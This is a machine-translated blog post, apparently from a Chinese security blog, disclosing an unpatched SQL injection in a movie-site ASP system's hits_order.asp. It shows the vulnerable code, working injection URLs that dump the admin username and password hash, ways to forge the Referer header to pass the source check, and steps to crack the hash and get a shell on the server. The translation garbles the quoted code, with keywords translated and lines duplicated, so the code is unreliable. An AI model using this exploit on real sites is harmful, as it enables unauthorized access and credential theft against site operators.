Eye-päevase film süsteemi 0day-0day, hits_order.asp, süst, silma-päevase film süsteemi-st0p blogi

Eye-päevase film süsteemi 0day

See sissekanne postitati oktoober 25, 2009

: St0p & My5t3ry
Reprodutseerida, palume viidata allikale http://www.st0p.org

Oh, ja My5t3ry tulla auk, võtke ametlik administraator, ole mulle tähelepanu.

Esiteks, andke mulle süstida probleem

Lünga faili / p_inc / hits_order.asp

  <! - # Include file = ".. / P_inc / config.asp" ->
 <! - # Include file = ".. / P_inc / function.asp" ->
 <! - # Include file = ".. / P_inc / function_func.asp" ->
 <! - # Include file = ".. / P_inc / openconn.asp" ->
 <! - # Include file = ".. / P_inc / G_function.asp" ->
 <%
 Then KUI Mitte ChkPost () Siis
	 G_error_page_1 vastus. Uuesti G_error_page_1
	 ( ) vastus End ()
 End Kui
 "Kõne ChkPost / p_inc / function.asp file () funktsioon avastada allikas URL
 url,numb ) Funktsioon G_hitss (url, tuimaks)
	 Dim str
	 str = ""
	 & numb & " id,m_name,m_pic,m_hits,m_content from qingtiandy_movie where m_look=1 order by m_hits desc,id desc" sql = "select top" ja tuimaks ja "id, m_name, m_pic, m_hits, m_content alates qingtiandy_movie kus m_look = 1 order by m_hits desc, id desc"
             "Ma nägin seda ei ole tuim, ei ole filter
	 server . CreateObject ( G_RS ) Set rs = server. CreateObject (G_RS)
	 , 1 rs. avatud sql, CONN, 1, 1
	 i = 1
	 Kas samas ei rs. Faililõpumärgend 
		 Array ( "d" ,rs ( 0 ) ,url ) ) d_url = url_ (Array ("d", rs (0), url))
		 "<div class=kkk1_list><a class=bbb href=" & d_url & " title='主演：" & rs ( 2 ) & "'>" & Get_length ( rs ( 1 ) , "" , 32 ) & "</a> (" & rs ( 3 ) & ")</div>" str = str & "<div class=kkk1_list> <a class=bbb href=" ja d_url &" title='主演:" & rs (2) & "'>" & Get_length (rs (1), "", 32) & "</ a> (" & rs (3) & ") </ div>
		 i = i + 1
		 rs. movenext
	 Silmus
	 G_hitss = str
 End Function
 %>
 G_hitss ( request ( "url" ) , request ( "numb" ) ) %> ") document.write ("<% = G_hitss (taotluse (" url ") taotlusel (" tuimaks "))%>")
 "Siin tuimaks filter

Meetodite kasutamist nagu
1 saab otseselt kasutada tarkvara võltsitud Referer, külastada järgmisel aadressil saavutada
Läbi XMLHTTP võltsitud Referer, külastada järgmisel aadressil rakendamine
3, JS JavaScripti kontrollida allika URL

  ( "<a href='/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,'>科幻片</a> " ) ; javascript: dokument. kirjutada (<a href='/p_inc/hits_order.asp?numb=1 (select str_username alates tbl_admin) kui username,(select str_pass alates tbl_admin) kui pass,'> ulme </ a> ") ;

http://www.st0p.org/p_inc/hits_order.asp?numb=1 (vali str_username alates tbl_admin) ja kasutajanime (vali str_pass alates tbl_admin) ja pass,

Märkus: hüpata üle Referer avastamine võib olla läbi POST, GET, COOKIE erinevaid võimalusi, et saavutada süstida. . .

Juurdepääs järgmist administraatori kasutajanime URL link, parool HASH kuvatakse otse välja. .

Crack parooli HASH sest taustal saab otse muuta ASP faili tagaplaanile ja võtab SHELL rida.

See protseduur on ka muid puudusi. Siin ei ole tehtud. .